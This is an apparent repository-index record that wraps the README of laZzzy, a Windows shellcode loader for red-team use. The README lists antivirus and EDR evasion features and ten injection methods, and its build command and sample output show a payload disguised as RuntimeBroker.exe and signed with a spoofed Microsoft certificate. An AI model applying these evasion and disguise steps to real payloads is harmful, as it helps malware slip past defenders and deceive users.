{"id":13574487,"url":"https://github.com/capt-meelo/laZzzy","last_synced_at":"2025-04-04T15:31:09.777Z","repository":{"id":63234404,"uuid":"494644055","full_name":"capt-meelo/laZzzy","owner":"capt-meelo","description":"laZzzy is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques.","archived":false,"fork":false,"pushed_at":"2023-01-10T23:35:50.000Z","size":74,"stargazers_count":460,"open_issues_count":4,"forks_count":69,"subscribers_count":13,"default_branch":"main","last_synced_at":"2024-11-05T09:44:43.574Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/capt-meelo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-05-21T00:49:53.000Z","updated_at":"2024-10-23T20:55:57.000Z","dependencies_parsed_at":"2023-02-08T20:47:12.397Z","dependency_job_id":null,"html_url":"https://github.com/capt-meelo/laZzzy","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/capt-meelo%2FlaZzzy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/capt-meelo%2FlaZzzy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/capt-meelo%2FlaZzzy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/capt-meelo%2FlaZzzy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/capt-meelo","download_url":"https://codeload.github.com/capt-meelo/laZzzy/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247202676,"owners_count":20900827,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T15:00:52.024Z","updated_at":"2025-04-04T15:31:04.765Z","avatar_url":"https://github.com/capt-meelo.png","language":"C++","funding_links":[],"categories":["C++"],"sub_categories":[],"readme":"## laZzzy\n![Python](https://img.shields.io/badge/python-3670A0?style=for-the-badge\u0026logo=python\u0026logoColor=ffdd54)\n![C++](https://img.shields.io/badge/c++-%2300599C.svg?style=for-the-badge\u0026logo=c%2B%2B\u0026logoColor=white)\n![Visual Studio](https://img.shields.io/badge/Visual%20Studio-5C2D91.svg?style=for-the-badge\u0026logo=visual-studio\u0026logoColor=white)\n![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge\u0026logo=windows\u0026logoColor=white)\n\nlaZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.\n\n\n### Features\n- Direct syscalls and native (`Nt*`) functions (not all functions but most)\n- Import Address Table (IAT) evasion\n- Encrypted payload (XOR and AES)\n  - Randomly generated key\n  - Automatic padding (if necessary) of payload with NOPS (`\\x90`)\n  - Byte-by-byte in-memory decryption of payload\n- XOR-encrypted strings\n- PPID spoofing\n- Blocking of non-Microsoft-signed DLLs\n- (Optional) Cloning of PE icon and attributes\n- (Optional) Code signing with spoofed cert\n\n### How to Use\n\n#### Requirements:\n- Windows machine w/ Visual Studio and the following components, which can be installed from _`Visual Studio Installer` \u003e `Individual Components`_:\n  - `C++ Clang Compiler for Windows` and `C++ Clang-cl for build tools` \n\n    ![Clang](img/clang.png)\n  \n  - `ClickOnce Publishing`\n  \n    ![ClickOne](img/clickonce.png)\n\n- Python3 and the required modules:\n  -  `python3 -m pip install -r requirements.txt`\n\n\n#### Options:\n```powershell\n(venv) PS C:\\MalDev\\laZzzy\u003e python3 .\\builder.py -h\n\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀\n\nusage: builder.py [-h] -s  -p  -m  [-tp] [-sp] [-pp] [-b] [-d]\n\noptions:\n  -h, --help  show this help message and exit\n  -s          path to raw shellcode\n  -p          password\n  -m          shellcode execution method (e.g. 1)\n  -tp         process to inject (e.g. svchost.exe)\n  -sp         process to spawn (e.g. C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe)\n  -pp         parent process to spoof (e.g. explorer.exe)\n  -b          binary to spoof metadata (e.g. C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe)\n  -d          domain to spoof (e.g. www.microsoft.com)\n\nshellcode execution method:\n   1          Early-bird APC Queue (requires sacrificial proces)\n   2          Thread Hijacking (requires sacrificial proces)\n   3          KernelCallbackTable (requires sacrificial process that has GUI)\n   4          Section View Mapping\n   5          Thread Suspension\n   6          LineDDA Callback\n   7          EnumSystemGeoID Callback\n   8          FLS Callback\n   9          SetTimer\n   10         Clipboard\n```\n\n#### Example:\nExecute `builder.py` and supply the necessary data.\n```powershell\n(venv) PS C:\\MalDev\\laZzzy\u003e python3 .\\builder.py -s .\\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\\\Windows\\\\System32\\\\notepad.exe -d www.microsoft.com -b C:\\\\Windows\\\\System32\\\\mmc.exe\n\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀\n\n[+] XOR-encrypting payload with\n        [*] Key:                        d3b666606468293dfa21ce2ff25e86f6\n\n[+] AES-encrypting payload with\n        [*] IV:                         f96312f17a1a9919c74b633c5f861fe5\n        [*] Key:                        6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec\n\n[+] Modifying template using\n        [*] Technique:                  Early-bird APC Queue\n        [*] Process to inject:          None\n        [*] Process to spawn:           C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe\n        [*] Parent process to spoof:    svchost.exe\n\n[+] Spoofing metadata\n        [*] Binary:                     C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe\n        [*] CompanyName:                Microsoft Corporation\n        [*] FileDescription:            Runtime Broker\n        [*] FileVersion:                10.0.22621.608 (WinBuild.160101.0800)\n        [*] InternalName:               RuntimeBroker.exe\n        [*] LegalCopyright:             © Microsoft Corporation. All rights reserved.\n        [*] OriginalFilename:           RuntimeBroker.exe\n        [*] ProductName:                Microsoft® Windows® Operating System\n        [*] ProductVersion:             10.0.22621.608\n\n[+] Compiling project\n        [*] Compiled executable:        C:\\MalDev\\laZzzy\\loader\\x64\\Release\\laZzzy.exe\n\n[+] Signing binary with spoofed cert\n        [*] Domain:                     www.microsoft.com\n        [*] Version:                    2\n        [*] Serial:                     33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6\n        [*] Subject:                    /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com\n        [*] Issuer:                     /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06\n        [*] Not Before:                 October 04 2022\n        [*] Not After:                  September 29 2023\n        [*] PFX file:                   C:\\MalDev\\laZzzy\\output\\www.microsoft.com.pfx\n\n[+] All done!\n        [*] Output file:                C:\\MalDev\\laZzzy\\output\\RuntimeBroker.exe\n```\n\n\n### Libraries Used\n- [kokke/tiny-AES-c](https://github.com/kokke/tiny-AES-c)\n- [skadro-official/skCrypter](https://github.com/skadro-official/skCrypter)\n- [JustasMasiulis/lazy_importer](https://github.com/JustasMasiulis/lazy_importer)\n- [JustasMasiulis/inline_syscall](https://github.com/JustasMasiulis/inline_syscall)\n\n\n### Shellcode Execution Techniques\n\n1. Early-bird APC Queue _(requires sacrificial process)_\n2. Thread Hijacking _(requires sacrificial process)_\n3. KernelCallbackTable _(requires sacrificial process that has a GUI)_\n4. Section View Mapping\n5. Thread Suspension\n6. LineDDA Callback\n7. EnumSystemGeoID Callback\n8. Fiber Local Storage (FLS) Callback\n9. SetTimer\n10. Clipboard\n\n\n### Notes:\n- Only works on **Windows x64**\n- Debugging only works on **Release** mode\n- Sometimes, **KernelCallbackTable** doesn't work on the first run but will eventually work afterward\n\n\n### Credits/References\n- Authors of the libraries used\n- http://undocumented.ntinternals.net/\n- https://doxygen.reactos.org/index.html\n- https://github.com/processhacker/phnt\n- https://www.vergiliusproject.com/\n- https://www.ired.team/\n- https://github.com/snovvcrash/DInjector\n- https://github.com/aahmad097/AlternativeShellcodeExec\n- https://github.com/paranoidninja/CarbonCopy","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcapt-meelo%2FlaZzzy","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcapt-meelo%2FlaZzzy","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcapt-meelo%2FlaZzzy/lists"}